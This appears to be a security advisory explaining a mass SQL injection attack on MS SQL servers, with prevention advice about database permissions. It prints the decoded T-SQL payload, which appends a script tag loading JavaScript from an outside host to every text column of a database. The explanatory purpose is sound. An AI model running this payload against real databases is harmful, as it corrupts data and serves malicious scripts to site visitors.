Over the past few months a new breed of SQL Injection attacks has started to show up in server logs across the globe. These attacks are so generic in nature that they work on any insecure MS SQL server and don't need to be customized for each attack.

How they work:
Like all SQL Injection attacks, this one looks for pages that access an MS SQL database but that don't sanitize its database inputs. The attack appends a piece of T-SQL code to the end of query string value similar to this:

	DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C41
	....[more hex code]
	26C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
What this code does is create a variable with a hexadecimal encrypted value and then execute that variable. If we look at the unencrypted version of the code above this is what we have:

	DECLARE @T VARCHAR(255),@C VARCHAR(255)

	DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM 
	sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' 
	AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

	OPEN Table_Cursor

	FETCH NEXT FROM Table_Cursor INTO @T,@C

	WHILE(@@FETCH_STATUS=0)
		BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=
		RTRIM(CONVERT(VARCHAR(4000),['+@C+']))
		+''<script src=http://www.adwbnr.com/b.js>
		</script>''')
		FETCH NEXT FROM Table_Cursor INTO @T,@C
	END

	CLOSE Table_Cursor

	DEALLOCATE Table_Cursor

This code gets a list of all database fields that can contain text and then appends to them a '<script>' tag which points to a javascript file off site. This causes the browser to try and load this javascript file whenever a page pulls the corrupted data from the database.

How to prevent it:
Preventing this SQL Injection attack centers on permissions set for the database users in MS SQL. Be sure that the user connecting to the database through the website application has permission only on the table(s) they need, and more importantly, make sure they do not have permission to access the sysobjects and syscolumns tables. These tables are the heart of an MS SQL database and access to it will give any intruder the names of all tables and columns in the database.